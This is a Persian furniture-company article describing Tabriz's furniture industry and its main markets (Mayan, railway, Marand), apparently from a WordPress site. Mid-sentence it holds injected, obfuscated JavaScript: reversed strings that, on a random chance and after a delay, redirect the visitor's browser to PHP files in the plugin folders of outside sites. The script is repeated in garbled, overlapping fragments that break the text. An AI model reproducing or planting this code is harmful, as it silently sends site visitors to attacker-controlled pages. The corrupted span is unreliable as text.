مبل در تبریز

مبل در تبریز

مبل در تبریز

در استان آذربایجان شرقی به ویژه در شهر تبریز صنعت چوب و به خصوص صنعت مبلمان از زمانهای دور یکی از صنایع تولیدی پر رونق به شمار می‌رود. امروزه اهمیت و ارزشی که ایرانیان و علی‌الخصوص تبریزی‌ها به زیباسازی منزل و دکوراسیون داخلی قائل هستند باعث شده است تا شاهد پیشرفت چشم‌گیر صنعت مبل در تبریز نسبت به گذشته باشیم. بنابراین به تناسب افزایش تقاضای بازار در زمینه مبلمان، قشر عظیمی از صنعتگران و تولید کنندگان به صورت گسترده و قدرتمند اقدام به راه‌اندازی بازارها و کارگاه‌های تولیدی مبلمان نموده‌اند.

لازم به ذکر است که سلیقه تبریزی‌ها در $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toote.com/mode/decor/model11-interior-decoration.html”>مد و دکوراسیون داخلی زبانزد خاص و عام می‌باشد. این عامل سبب شده تا بازار دکوراسیون داخلی، به ویژه مبلمان و سایر مصنوعات چوبی در این شهر در مدت کوتاهی به یکی از قدرتمندترین قطب‌های تولید و عرضه مصنوعات چوبی به خصوص مبلمان تبدیل شود.

مبل در تبریز

تولید کنندگان مبل در این شهر به تناسب مهارت و سابقه‌ی کاری و به اقتضای بازار هدف‌شان اقدام به تولید انواع مبلمان در مدلهای مختلف نموده‌اند. مدلهای مبلمان در تبریز به طور کل به سه دسته اصلی تقسیم می‌شوند.

۱_ مدل مبل سلطنتی یا مبل استیل در تبریز

۲_ مدل مبل راحتی در تبریز

۳_ مدل مبل کلاسیک در تبریز

امروزه بازارهای مبل به صورت گسترده در مناطق مختلف کلان‌شهر تبریز پخش شده‌اند که در اینجا به چند نمونه از این بازار‌ها اشاره خواهیم کرد.

بازار مبل مایان تبریز

بازار مبل مایان مهم‌ترین، مشهورترین و بزرگ‌ترین بازارهای این شهر می‌باشد. بازار مبل مایان در شمال‌غرب تبریز واقع در اتوبان تبریز-مرند نرسیده به پلیس راه تبریز در حوالی روستای مایان قرار دارد. این بازار به دلیل تنوع بالای مصنوعات چوبی به خصوص مبلمان، آن هم با قیمتهای متفاوت و مناسب، توجه قشر عظیمی از مشتریان و مخاطبان را به خود جلب کرده است. مجموعه الماس و مجتمع مروارید و رویا از جمله مکانهایی است که در بازار مبل مایان قرار دارند و آماده استقبال از مشتریان عزیز می‌باشند.

بازار مبل راه ‌آهن تبریز

یکی دیگر از مهم‌ترین بازارهای مبل در پایتخت آذربایجان بازار مبل راه آهن است که بعد از میدان جهاد (نصف راه) به سمت راه آهن مابین چهار راه خطیب و میدان راه آهن واقع شده است که یکی از بازارهای قدیمی و قدرتمند در زمینه مبلمان به شمار می‌رود. در بازار مبل راه آهن ده‌ها فروشگاه و  چندین تولیدی وجود دارد که انواع مدلهای مبل سلطنتی، مبل کلاسیک و مبل راحتی را عرضه می‌کنند.

از دیگر بازارهای معروف در این شهر که در زمینه مبلمان و سایر مصنوعات چوبی فعالیت می‌کنند می‌توان به بازار مبل قره آغاج، شهرک مدنی (آخر لاله)، پایانه بسیج و … اشاره کرد که هر کدام به نوبه‌ی خود نقش بسزایی در پیشرفت و گسترش بازارهای مبل این شهر ایفا می‌کنند.

بازار مبل مرند

البته در استان آذربایجان شرقی علاوه بر خود تبریز شهرستان‌های دیگر نیز از قدرت و نقش بسزا و منحصر به فردی در ترقی صنعت چوب شمال‌غرب کشور و تأمین خواسته‌ها در زمینه مبلمان برخوردارند. که یکی از نامدار‌ترین این بازارها بازار مبل مرند می‌باشد.

بازار مبل مرند در ۳۵ کیلومتری شمال‌غرب تبریز قرار دارد که به علت وجود بیش از ۱۵۰۰ تولیدکننده فعال (نجاری – رنگکاری – رویه‌کوبی – و…) در زمینه مبلمان یکی از قطبهای قدرتمند در تولید و تأمین مبلمان استان آذربایجان شرقی و کشور عزیزمان ایران به شمار می‌آید.

تولیدی مبلمان شایان چوب نیز افتخار دارد که توانسته، هرچند اندک درصد ناچیزی از تولیدات بازار مبل مرند را، آن هم با به کارگیری نیروی انسانی ماهر و بهره‌مندی از باکیفیت‌ترین و مرغوبترین لوازم اولیه در تولید و عرضه آن به مشتریان، بر عهده بگیرد.

شایان چوب؛ حس خوب زیبایی و آسایش

با تقدیر و تشکر ویژه از شما:

رضا شایان‌پور مدیریت مبلمان شایان چوب

 

1 دیدگاه برای “مبل در تبریز

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *